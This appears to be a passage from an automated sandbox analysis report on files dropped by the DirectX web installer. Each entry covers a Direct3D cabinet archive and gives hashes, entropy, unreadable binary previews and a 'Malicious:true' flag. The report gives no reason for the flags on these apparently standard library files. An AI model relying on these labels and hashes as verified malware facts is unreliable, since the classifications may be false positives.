                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              C:\Windows\msdownld.tmp\AS45C6EA.tmp\Aug2009_d3dcsx_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Preview:MSCF....t.2.....D...........................t.2..#..................`.S.......$;....d3dcsx_42.dll.....`.S...$;...d3dcsx_42_x86.cat.......T...$;...d3dcsx_42_x86.inf.(.....T...$;...d3dcsx_42_x86_xp.inf.c.....T...$;...AUG2009_d3dcsx_42_x86.inf.?b5B.]..CK.w\T..7.Mnb.QA..E..Q .B...AD..X.q.JS.H..&&.....HS... .a.n.((..J/....!R.a.y..g0......<....9.}.^{.....do3.sb........PL....V......_.|)V..w.a.d.>.#~k.......Z.t.......e.o...#.k.,..x.8.(/\.......5.4....?.Z.B;.9;t/....@..^&..C...m.........f.....#N..._e.c(&f....].-|.....>X..?>..S.#&..!..v.BLl1*b.^.&....},..r|4...}Dy...@....\,.^..R....#v....Gl..j%v..w.k...^.....(...........l..m..,............k..J ..?.o.FL.{e........Cj.{..=.-&.oe_?_'8's....~..k.o.}]<}.a.^jnb.....j...........U..3p.....]pl.C..)8.....#V.G..Yp\.#....0.C..q8...#6.G+..p..:...)....#..G8...H.#..z8..x..8._.;Rp......8.....A8hp..#..Sp\.#..Ox....8..0.c3.RpLk.<.x..-8R.#....q..x..~.?}]Jz.bU8L...........j..z.K...6.{Cl..6.sVsV.Z.....sGUrE;..'..a.#>.._Q.U}....sb.\....}-A.

                                                                                              C:\Windows\msdownld.tmp\AS45D83F.tmp\Aug2009_D3DCompiler_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..............=...X!........$;....D3DCompiler_42.dll.....X!....$;...D3DCompiler_42_x86.cat.!....;....$;...D3DCompiler_42_x86.inf.<....>....$;...D3DCompiler_42_x86_xp.inf.....4A....$;...AUG2009_D3DCompiler_42_x86.inf. ..$..CK.Zyx...?..P....%i..@.mh...,e.Y...5...&.!K).Pe.*........;**..zq.j...* ./..s./dR...=.}.....y.o....93I;.+X.c,.....-Ln..o.)z.<.m..F..e...s.|a....!w@...A=..jj(.T}A.j.j@.j..=...c...=...m.....m...m...6.h.o...[....m.h.k+...s<./F.R.'.<..7Vs...f*.......]..M...O6.NVD....o.{v..*.-.ub..........5..q."....V6..m..B._l..w...mI....j.S...mdlG.c..0.*U.p.. ..?.;"ZS..}?b\|...=.<...q...Wb.s..9..:.VG(......ExM.w.Mp.4.N..g...Vjg..7./\nG....Wyn..l.."..;..6...v....S....b1.Y...^..Sk..P....vRl.x..!.u..)Z(B.u.gQL.(...R0..../)>.x...<..d.3(..h.h.XE...."......}T.....(.S<O.(....(n......|......b&.....E.y....),.m{ml7.7..S.G.....[(.S..XE.L..Hc.L...6.w(vR|C...."......y.........M....o..-.....[.h.b....V4.I9...D.As..]h....).]

                                                                                              C:\Windows\msdownld.tmp\AS45DFF0.tmp\Jun2010_d3dx9_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............................#..............>...X}.........<!]..d3dx9_43.dll.....X}.....<C'..d3dx9_43_x86.cat...........<.&..d3dx9_43_x86.inf.,.........<.&..d3dx9_43_x86_xp.inf.\..........<.&..JUN2010_d3dx9_43_x86.inf.[.'.":..[.... .......5!.P..wOnf..O..........9vm..o..f.6.....+I).H]..t.....T...v.!..M.......>>.{..._..t....g...:..jh.N....K...vJ.r.. ....;J.zq.....*....H....'....d.=...{O.4.xIBC..L7..2....... ..E5`5`........<s...9..(.b3. .."t....M\.;...0......*...H....K.5$...L.Ha....%..e..V........{.t....#3kk.sR6.....I.u.Em....b.Dl'.E.[.D.N....m53%...'.m;.>..yf.6..pN..N.y...-.5Y...f.......-.B#.......;.D]......G.8.5...*G.......x..}...!.GwT.......WwKuT...Y.l[f..}ji...{.h{...x.u.....>..1....k..v.D."W..ZA..<...7=c2QN.Y.......v..k&aHudg.W...`HbV{.Q..CJk..nLpw..#.&5.%S...G.&.`....]...EpFY...(....P\..+/`..&..ap....S....BR..'....s..c........p..B..j*....c..D....mU.x....N.r..QfEz`...}.._...........8..$..........!.G...i.@..P...."c..d.L00...QX.B0.

                                                                                              C:\Windows\msdownld.tmp\AS45E7A1.tmp\Jun2010_d3dx10_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200491
                                                                                              Entropy (8bit):7.9966634458730566
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
                                                                                              MD5:591A61BD06C73C70F93DAC5AF2D8E924
                                                                                              SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
                                                                                              SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
                                                                                              SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
                                                                                              Malicious:true
                                                                                              Preview:MSCF....[.......D...............}...........[....#..................`/.........<!]..d3dx10_43.dll.....`/.....<B'..d3dx10_43_x86.cat......I.....<.&..d3dx10_43_x86.inf.(....L.....<.&..d3dx10_43_x86_xp.inf.c....O.....<.&..JUN2010_d3dx10_43_x86.inf..=.h`1..CK..T.I....8*....ePQP....SENJ..1 q....a@EE.a]E.5....F.t...s.v.iM._W7+..:..........oW.*NMM....e...1.*+.f.#..2.....7.S..V..|..O.yX.2]..Q'jbReq1*.Z+.U.4.*.R%........6....<./...gU.g.)...u.y....dj.....UJ'j....[/.../E....e\.._...^..Gb..}.*...37..2L..a..q...../.|...z.#e$.ZU7...vnkmh?W....-..L^...h.0.....>.Y._....f.......vpO#.1..6_U.o.......h.#.`.d....j.F.0.6.1..>.H...`'J..A.%6.tM.\.:<.......F...!.K......?t.:...../...2..=...2....&e^...I.M`........H."........@&0.X...%.1..p.h3L(..V....K...5....X........x.]..@}.F.8.......%.T`.....=...!...x`40...v.g...k..6...@. .......wh.@ .......F..+..#`.....p_-e*.3...^`+....&..@.......o....:.... ....c.&p.8.....6.K..@......e~....H.w..R..........`.0.X....G..`)k.8...-0.....n.....R......f..

                                                                                              C:\Windows\msdownld.tmp\AS45ED6D.tmp\Jun2010_d3dx11_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Preview:MSCF....=.......D...........................=....#..................`..........<!]..d3dx11_43.dll.....`......<B'..d3dx11_43_x86.cat............<.&..d3dx11_43_x86.inf.(..........<.&..d3dx11_43_x86_xp.inf.c..........<.&..JUN2010_d3dx11_43_x86.inf.kK.*. ..CK.|.\.U........:(.....;.........\.".+...K......a....f*.eZVZf../M.2M1M35.bj..%~gf.,gv.........~>..<..{.y.93.{fv.c..(%EQ*d......?...?...z.i.^u=.g.b..>.%....*..*s...\Qa..'[.U5....c|Z...Zl.....m....\u....s....|.....2...s..*.rE^ Wn..J..j|.$...2....mO.ul.E.V..c.7R...E..+t...2p....@>.V`..<.).Rp..*_UrI{h.../Z..0|...sQJ*ACQ..J....*.F%..W.T..*....E.{P.....1..A..U.6...2.J..|^a|.....Zl....|.>.tT.P.x..=C.......V..b'^..*K....}.s...op.....?..'=...2T>.l).....l.2Od?E*.S.....V .GV.l<.Q. .Bv.]7......d...MB..,..72Od..WR...D.6.M.V!{...d%..B...@.L..j..:..(.=.G....b..BV.l...d....B........p%u....F.....l.!.G..l.2.,.. d...|..Qm.v....G..L...).C..c.#.Ih...................ee.......VPL....8X...H1.=A1...q....2.E!.l..M.E..jTw.z.y..*d....m...Y.

                                                                                              C:\Windows\msdownld.tmp\AS45F2EB.tmp\Jun2010_d3dcsx_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............:...`..........<!]..d3dcsx_43.dll.....`......<B'..d3dcsx_43_x86.cat...........<.&..d3dcsx_43_x86.inf.(..........<.&..d3dcsx_43_x86_xp.inf.c..........<.&..JUN2010_d3dcsx_43_x86.inf.UR.....CK.{t.e.....6.I.Zp....a/.v.U#.Hi.%..V.f......&[(. .R..l.Tm4VA..."..-JA.Z.@....J.....x.....$.|..y|....fv7..._..wf.-.N.QJ..z.......Q.....<aG....=5.K...,......^.....]]....`..`GWp.9........S..c...>9kG.P.M...\......^O..[:.7.5..s.....|.........#.|.....TS.Xu0.....W.5.J...G....{.....*8.E...J.:B..l...9...........E..Q..'8j.....u.a.V.T.$Y.....O.V*..?.HW.._..........rMiA..g.;r....M'.Iy>9Z...!Y.sF.'......<.}..<......X....o;5..T.,..g.3|.....\....QOK.#5 .Vj....3."R'J...z.Q......n..R}R.K.J.:Ej..*.uHj..CR;.6K...>...QWK.Im..U.A.g...'.N..J.,..j.:Kj.....R.H]..Nj.TV~6#.Tj.T.T...R.R..;j...R.H.H....|.5..'.d...z.kU.eR....z..d....*...PO.6..J....ZT...t8T..d...D8.ji2.Lf$..lGw....7^s............k.j.q/...\.f..}ek'....

                                                                                              C:\Windows\msdownld.tmp\AS45FA8D.tmp\Jun2010_D3DCompiler_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....G.......D...............''..........G....#..............A...h# ........<!]..D3DCompiler_43.dll.....h# ....<B'..D3DCompiler_43_x86.cat.!....= ....<.&..D3DCompiler_43_x86.inf.<....A ....<.&..D3DCompiler_43_x86_xp.inf.....QC ....<.&..JUN2010_D3DCompiler_43_x86.inf.W...P!..CK.[{|[.}?.J..'r.$...k.I........;/.`HZBG.e..V.....C....e@..i.%.@C.:.e..2F..t..A...n.i..e..F...s.W..,.l.g...7.{~.....y.k....`...06..1._.l...af..3..S^.<&my.r[. .h.p_.;....P8...J$.R.!...@.:g.Z.......;...s.}.m.....)...U.....4.H..m....u.]s......A.....d.]..."YYK.....&WN..2v..._........*.?vq/3fc.@^.XSD.zD.:.K.a.Mt..........r...LT...C1.+........s..(d.,G.O.l..:y\.X..S.bD.. /..5S.2.v..1/...<r_G.b6^..3....^.@.._5.f.vgD..I..gznTl...[w......p.y[....u...B...v..........&.%..].u.:....}...{..".)..........;......*B1.Jx.b9I8Ax.p.p.PF...........F.".".....|.^%.Hx....;.#.{.......1..B7a.a....$T.J.3.V....=..7./......%<F8B...v.....C.N.$<Hy|.p....Y..W.'.....\i..J(&(.%.....0.S.=y_..........F..[Jp.1......(-.....

                                                                                              C:\Windows\msdownld.tmp\AS46029B.tmp\Feb2005_d3dx9_24_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1250707
                                                                                              Entropy (8bit):7.999567218170613
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
                                                                                              MD5:DCA673A8F9F834F9370862D1C97FD9E7
                                                                                              SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
                                                                                              SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
                                                                                              SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............{................#..............o...7.........E2.. .d3dx9_24_x64.cat...6.7.....E2.. .d3dx9_24.dll......26...E2h. .infinst.exe.......7...92.. .d3dx9_24_x64.inf. ..nl9..[.... Wnq..@..$Q.P...>.$..B;.*.......R...te.....K+.E...E%.....Zk...AQ.....8....C........h...:'iI....5B.'.:}..Y{-.H.6.*.......b...$.P........'..*..i.....H..i"8..$..........!"..."I.n6.Me6...Z..F)..P.^P..P.W.~........&V...q..~..'.AE.!...."...(.$.eP.HD..5................k..Ky%.>.kS....l.)...uN.-.$S.."......I@...bh./V.).A.....+.].....'.]....q.>.Uo...."..g...U.(...qXq.pH.L... ...."V.....Q.R....'>\...9.s............8....]gON..`a..S..u.O%.e.....U...H..CCr`.n...7=}...|z..3...k......CH.^.#..../.....c.rM_.`............"...y#.....YW...<..%CZ...=.c....ni......8.^....G.V.J8..". .?@.+R..'...m.7...JX...q....p.......:....zs..@.....9..w.Q......3+.......wt...G.\..V..8......B.=+.,#..l.Z..R.....F.=8.....#p..'......>.q.h...E.ME.^ig......./......".GB.O..Q...i.-r. .......

                                                                                              C:\Windows\msdownld.tmp\AS460B75.tmp\Apr2005_d3dx9_25_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA

                                                                                              C:\Windows\msdownld.tmp\AS461568.tmp\Jun2005_d3dx9_26_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Preview:MSCF....zK......D...........................zK...#..............v...7..........2b} .d3dx9_26_x64.cat..|9.7......2]| .d3dx9_26.dll.......9....20| .infinst.exe......:....2.} .d3dx9_26_x64.inf.&...r.:....2.} .jun2005_d3dx9_26_x64.inf.XW&..8..[.... 6.q.....#Q.P...M.$=\7....O.m...D..)j......J.W."...z...B.........<$]@.f.hf....../..K....(`.P.. ....d}.U....rW.q...U..z.3)K....Zl.cI.Fm..7..D.AS..* .H.25@........1....0n(....vs.].mJ..0...Q.A.....c.+P>......O..3)s".N..!..L..':....B.L...h)s.`.U......L....Bzj..%...H2r..J..rP.~.a..T.[.Oc...N!(0..P.B....|Ih...5...A.|.a...,.x.Qa<..~aCT...@...|.G1!|.|!..I..".. z..........S..C..Q.O....x..>...e..C..7.l1l ...@.YD...~L{.)......f..T.Y{...R.!a.}.hAs5..o9..4.w.#.........?|..+.$.r...KG........Q<.KR.....%....W:..8.....ET..>D.[T(..?....I.R3...W...4..C|....v..0.....`.e.Fp|>.<+Q..-..QS/.p.).qZ....GsV.f..PN"5..P>.K..e.Q.~..A...3|..E...D&N:.%...O.......^cc...O.........s.].=,#.je..No.........G..x..#.xg..D.s..}.L.`..|....N`.N......&W..P..

                                                                                              C:\Windows\msdownld.tmp\AS461E41.tmp\Aug2005_d3dx9_27_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1353750
                                                                                              Entropy (8bit):7.999671999388792
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
                                                                                              MD5:A9F4068650DF203CEE34E2CA39038618
                                                                                              SHA1:CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
                                                                                              SHA-256:3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
                                                                                              SHA-512:C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
                                                                                              Malicious:true
                                                                                              Preview:MSCF....F.......D...........................F....#..............w...<..........2.. .d3dx9_27_x64.cat...:.<......2d. .d3dx9_27.dll......7:....29. .infinst.exe.&....-;....2.. .aug2005_d3dx9_27_x64.inf......1;....2.. .d3dx9_27_x64.inf....p.9..[.... x.m......R.P...?-.."..."-..%V"J..J ...E.VPU..*.2jC..UJ...^P.a..T.A..,...;.......YI...K.....!.N...s..f.m...Q.........<X...J]G2.... ..A..l.m........ .......@....2sx2.HH.....@dC...pWCy/....!..k.GVc.).1q.P.=...b.ua.%ER.q...t.>q.?RVa..$..j.|..'..RZ.Y..zn.c......q./.2G2w...|p4Q.Q.F...X./..~......F[$..!.#..Q....$*.P|....tE..../...3....a.....y...'...[6..^@.k...+.y.:..h_h.8..C...I................3.<..*.#....0.x.....?;!.g.......t.p.o...2!.x..M....~.g..~..hH...KIx.g...-....IX.Ru..P....J..{|,.3.#.wz........K...W.Y.....}..d.l...\..P.z...[HoP.....X...f.5.=b....hy......Jw...q.N'r.B........\.x..J..c..`=&.L!...R.......y..]x......~......s..}..'..S|n....%3.=........Z..T..._./(5\[v..r....~.....I.!..cjv).M...x....(&.(../.:q..1.......

                                                                                              C:\Windows\msdownld.tmp\AS462805.tmp\Dec2005_d3dx9_28_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
